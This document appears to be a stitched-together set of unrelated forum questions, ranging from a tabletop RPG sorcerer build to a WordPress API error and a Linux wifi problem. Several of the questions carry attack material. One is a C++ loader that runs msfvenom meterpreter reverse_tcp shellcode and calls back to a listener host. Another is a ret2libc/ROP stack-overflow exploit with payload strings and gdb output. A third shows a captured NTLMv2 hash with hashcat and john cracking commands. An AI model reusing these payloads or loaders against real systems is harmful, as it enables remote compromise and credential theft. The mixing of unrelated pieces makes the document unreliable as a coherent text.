as a Sorcerer, given that I can’t multiclass or take feats, how successful can I be at passing concentration checks starting at level 15 [closed]

I’m doing a melee sorcerer, but I’m afraid of losing my concentration in combat because in the higher levels the damage is too big and the concentration check is too difficult.
My campaign dosen’t allow feats and multiclassing, only ASI.
Is the haste spell worth it at higher levels?

not worth it to cast only to lose it in one round because I was hit and lost concentration – that’s what I mean by "Is it worth it?"

dex- (+2) str- (+2) / int – (0) / wis- (-1) / const (+5)

prof- (+5)

Can’t inject meterpreter shellcode in c++ code

I want to inject meterpreter shellcode in a c++ program .

When i create .exe file in msfvenom i try it in my virtual machine (windows 7) and it works well but when i create shellcode and inject it in a c++ file the programe compile succesfully but crashes when i launche it in my VM

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.208.133 LPORT=4444 -f c -o main2.txt 

here i my c++ code (compiled in x64 debug mode with microsoft visual studio):

#include <iostream> #include <Windows.h> int main() { char shell[] =      "\xfc\x48\x83\xe4\xf0\xe8\xcc\x00\x00\x00\x41\x51\x41\x50\x52"     "\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48"     "\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9"     "\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41"     "\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48"     "\x01\xd0\x66\x81\x78\x18\x0b\x02\x0f\x85\x72\x00\x00\x00\x8b"     "\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01\xd0\x50\x8b"     "\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48\xff\xc9\x41"     "\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0\xac\x41\xc1"     "\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c\x24\x08\x45"     "\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0\x66\x41\x8b"     "\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04\x88\x48\x01"     "\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59\x41\x5a\x48"     "\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48\x8b\x12\xe9"     "\x4b\xff\xff\xff\x5d\x49\xbe\x77\x73\x32\x5f\x33\x32\x00\x00"     "\x41\x56\x49\x89\xe6\x48\x81\xec\xa0\x01\x00\x00\x49\x89\xe5"     "\x49\xbc\x02\x00\x11\x5c\xc0\xa8\xd0\x85\x41\x54\x49\x89\xe4"     "\x4c\x89\xf1\x41\xba\x4c\x77\x26\x07\xff\xd5\x4c\x89\xea\x68"     "\x01\x01\x00\x00\x59\x41\xba\x29\x80\x6b\x00\xff\xd5\x6a\x0a"     "\x41\x5e\x50\x50\x4d\x31\xc9\x4d\x31\xc0\x48\xff\xc0\x48\x89"     "\xc2\x48\xff\xc0\x48\x89\xc1\x41\xba\xea\x0f\xdf\xe0\xff\xd5"     "\x48\x89\xc7\x6a\x10\x41\x58\x4c\x89\xe2\x48\x89\xf9\x41\xba"     "\x99\xa5\x74\x61\xff\xd5\x85\xc0\x74\x0a\x49\xff\xce\x75\xe5"     "\xe8\x93\x00\x00\x00\x48\x83\xec\x10\x48\x89\xe2\x4d\x31\xc9"     "\x6a\x04\x41\x58\x48\x89\xf9\x41\xba\x02\xd9\xc8\x5f\xff\xd5"     "\x83\xf8\x00\x7e\x55\x48\x83\xc4\x20\x5e\x89\xf6\x6a\x40\x41"     "\x59\x68\x00\x10\x00\x00\x41\x58\x48\x89\xf2\x48\x31\xc9\x41"     "\xba\x58\xa4\x53\xe5\xff\xd5\x48\x89\xc3\x49\x89\xc7\x4d\x31"     "\xc9\x49\x89\xf0\x48\x89\xda\x48\x89\xf9\x41\xba\x02\xd9\xc8"     "\x5f\xff\xd5\x83\xf8\x00\x7d\x28\x58\x41\x57\x59\x68\x00\x40"     "\x00\x00\x41\x58\x6a\x00\x5a\x41\xba\x0b\x2f\x0f\x30\xff\xd5"     "\x57\x59\x41\xba\x75\x6e\x4d\x61\xff\xd5\x49\xff\xce\xe9\x3c"     "\xff\xff\xff\x48\x01\xc3\x48\x29\xc6\x48\x85\xf6\x75\xb4\x41"     "\xff\xe7\x58\x6a\x00\x59\x49\xc7\xc2\xf0\xb5\xa2\x56\xff\xd5";  void* exec = VirtualAlloc(0, sizeof shell, MEM_COMMIT, PAGE_EXECUTE_READWRITE); memcpy(exec, shell, sizeof shell); ((void(*)())exec)();  return 0;  } 

here is the error:

the application was unable du start correctly : c000007b 

What is my mistake ? thanks for answers !

ROP execute a shell with execl() – /bin/sh: 0: Can’t open

A vulnerable C program to stack buffer overflow, requires 112 byte stuffing to get to return address of the calling function. Here the Strcpy() is the vulnerable function.

void f(char *name){   char buf[100];   strcpy(buf, name); }  void main(int argc, char *argv[]){   f(argv[1]); }  

Trying to write the rop gadgets to execute a /bin/sh shell by means of execl(). The exploit would be:

python -c 'print 112*"\x90" + "addr. execl()" + "addr. exit()" + "addr. /bin/sh" + "addr. /bin/sh"'   

From gdb these are the found addresses (ASLR disabled for test):

(gdb) print execl       $  1 =  0xb7eb7b60 <__GI_execl> (gdb) print exit       $  2 =  0xb7e359e0 <__GI_exit>  (gdb) info proc map  ...(output omitted) (gdb) find 0xb7e07000,0xb7fbb000,"/bin/sh"       0xb7f62b0b       1 pattern found. (gdb) x/s 0xb7f62b0b       0xb7f62b0b:   "/bin/sh"  (gdb) run $  (python -c 'print 112*"\x90" + "\x60\x7b\xeb\xb7" + "\xe0\x59\xe3\xb7" + "\x0b\x2b\xf6\xb7" + "\x0b\x2b\xf6\xb7"')       Starting program: /home/marco/asm/execve/bypass_aslr/rop/prove/main $  (python -c 'print 112*"\x90" + "\x60\x7b\xeb\xb7" + "\xe0\x59\xe3\xb7" + "\x0b\x2b\xf6\xb7" + "\x0b\x2b\xf6\xb7"')       process 3161 is executing new program: /bin/dash       /bin/sh: 0: Can't open UWVS��������       [Inferior 1 (process 3161) exited with code 0177] 

The same test using system() gives the shell.

I don’t understand if the execl() is successful and if it’s replacing the currently running process image.

Platform: Ubuntu 16.04 – 32 bit.

UPDATE: I added some gadgets to the exploit, and got back another result. In brief i added gets() to write the NULL byte as the third argument to pass to execl(). The exploit will write the stack in this order:

addr. exit() fake byte (NULL will be written here)   addr. /bin/sh addr. /bin/sh addr. pop\pop\pop\ret addr. execl() addr. where to write NULL byte addr. pop\ret addr. gets()        <-- ESP will be here when is time to return to caller             112 NOP 

from gdb i run the exploit, i type "new line" so gets() writes NULL to the provided address, and the result is:

[Inferior 1 (process 2793) exited normally] 

This time no errors, but again no shell.

EDIT2: this is the stack after gets() is executed and before execl().

The commands under gdb i used to take the stack layer:

(gdb) b 10     --> this is to stop after strcpy() in the .c code   Breakpoint 1 at 0x8048497: file main.c, line 10.  (gdb) run $  (python -c 'print 112*"\x90" + "\xe0\x83\xe6\xb7" + "\x6e\xd0\xe2\xb7" + "\xf8\xf5\xff\xbf" + "\x80\x9a\xeb\xb7" + "\x4f\x33\xef\xb7" + "\x0b\x4a\xf6\xb7" + "\x0b\x4a\xf6\xb7" + "\x42\x42\x42\x42" + "\xd0\x79\xe3\xb7"')    Starting program: /home/marco/rop/main $  (python -c 'print 112*"\x90" + "\xe0\x83\xe6\xb7" + "\x6e\xd0\xe2\xb7" + "\xf8\xf5\xff\xbf" + "\x80\x9a\xeb\xb7" + "\x4f\x33\xef\xb7" + "\x0b\x4a\xf6\xb7" + "\x0b\x4a\xf6\xb7" + "\x42\x42\x42\x42" + "\xd0\x79\xe3\xb7"')   Breakpoint 1, func (name=0xb7e2d06e <__ctype_get_mb_cur_max+30> "X3U0327") at main.c:10   (gdb) b *execl   Breakpoint 2 at 0xb7eb9a80: file execl.c, line 31.   (gdb) c   Continuing.    Breakpoint 2, __GI_execl (path=0xb7f64a0b "/bin/sh", arg=0xb7f64a0b "/bin/sh") at execl.c:31   31    execl.c: File o directory non esistente.   (gdb) x/x $  esp   0xbffff5ec:   0xb7ef334f   (gdb) x/x $  esp+4   0xbffff5f0:   0xb7f64a0b   (gdb) x/x $  esp+8   0xbffff5f4:   0xb7f64a0b   (gdb) x/4x $  esp+12   0xbffff5f8:   0x00    0x42    0x42    0x42   (gdb) x/s $  esp+12   0xbffff5f8:   "" 

Please note, this test was executed from another Ubuntu 16.04, and the addresses are now:

"\xe0\x83\xe6\xb7" +   -> gets() "\x6e\xd0\xe2\xb7" +   -> pop/ret "\xf8\xf5\xff\xbf" +   -> address where to write NULL "\x80\x9a\xeb\xb7" +   -> execl() "\x4f\x33\xef\xb7" +   -> pop/pop/pop/ret "\x0b\x4a\xf6\xb7" +   -> addr. /bin/sh   "\x0b\x4a\xf6\xb7" +   -> addr. /bin/sh "\x42\x42\x42\x42" +   -> fake address to be overwritten "\xd0\x79\xe3\xb7"     -> exit() 

Can’t use /wp-json/wp/v2/plugins API endpoint even as administrator

Using Basic Authentication as an Administrator, I am getting an error code 401 Unauthorized : [rest_cannot_view_plugins] Sorry, you are not allowed to manage plugins for this site. error when I attempt to access the GET /wp-json/wp/v2/plugins endpoint of my server. I can pull Post and Page info with no problem, but when I query against the plugins, I’m getting the 401 error. I’ve confirmed that the userid used in the API call should be able to manage plugins using the CLI tool:

#  wp user list-caps $  USER | grep plugin activate_plugins edit_plugins update_plugins delete_plugins install_plugins 

Any pointers would be appreciated.

Why can’t we compile 8086 Assembily for all OSs from any OS?

If Mac OS, Linux, and Windows (mostly) all use Intel’s 8086 64 bit instruction set, why can’t we compile 8086 64 assembly from any operating system to any other operating system? (e.g. compile a Mac OS executable from assembly in Windows). Surely it would just be a matter of knowing what the machine code is for any given instruction?

I can’t use the wifi because of permission issues [closed]

I wasn’t able to create an account other than root for a while, then i learned how to do it in the terminal. I made the non root account, and I noticed that it doesn’t have the content that the root user has, and it isn’t even the administrator. I went back to the root account (I’m 99.9% I still had wireless connection), and made the account an administrator. After that I went to the main storage, and changed the permissions of the main storage (computer) as a whole. Then I went back to the normal account and noticed that I didn’t have the option of wireless connection anymore, and neither do I on root (I have the driver installed still, and it worked perfectly before). What could I do to bring wifi back? Your help would be much apriciated!

Can’t open hash with John or Hashcat

I’m trying to open a hash with John and HashCat, but both don’t work?

NTLMv2 Response Captured from 192.168.1.1 DOMAIN: DEV29-APP01 USER: testuser LMHASH:Disabled LM_CLIENT_CHALLENGE:Disabled NTHASH:3045e74dac0653865d353e93e8c5ca8c  NT_CLIENT_CHALLENGE:0101000000000000c2af33072879d60195da2f228ded77b7000000000200120041004e004f004e0059004d004f00550053000100120041004e004f004e0059004d004f00550053000400120061006e006f006e0079006d006f00750073000300120061006e006f006e0079006d006f00750073000800300030000000000000000000000000200000feb33cee8c0f22d8b27a15278ee7fdfbb47b23655ada87d2da7b3a3b1db5450e0a00100000000000000000000000000000000000090038004d005300530051004c005300760063002f003100360038002e00360033002e003100310031002e003100300036003a0031003400330033000000000000000000 

Manually rewritten to:

testuser::DEV29-APP01:3045e74dac0653865d353e93e8c5ca8c:0101000000000000c2af33072879d60195da2f228ded77b7000000000200120041004e004f004e0059004d004f00550053000100120041004e004f004e0059004d004f00550053000400120061006e006f006e0079006d006f00750073000300120061006e006f006e0079006d006f00750073000800300030000000000000000000000000200000feb33cee8c0f22d8b27a15278ee7fdfbb47b23655ada87d2da7b3a3b1db5450e0a00100000000000000000000000000000000000090038004d005300530051004c005300760063002f003100360038002e00360033002e003100310031002e003100300036003a0031003400330033000000000000000000  me>hashcat -m 5600 -a 3 testuser.txt --force Hashfile 'testuser.txt' on line 1 (testus...31003400330033000000000000000000): Separator unmatched No hashes loaded.  me>john --format=netntlmv2 testuser.txt Using default input encoding: UTF-8 No password hashes loaded (see FAQ) me>john --show --format=netntlmv2 testuser.txt 0 password hashes cracked, 0 left 

What am I missing?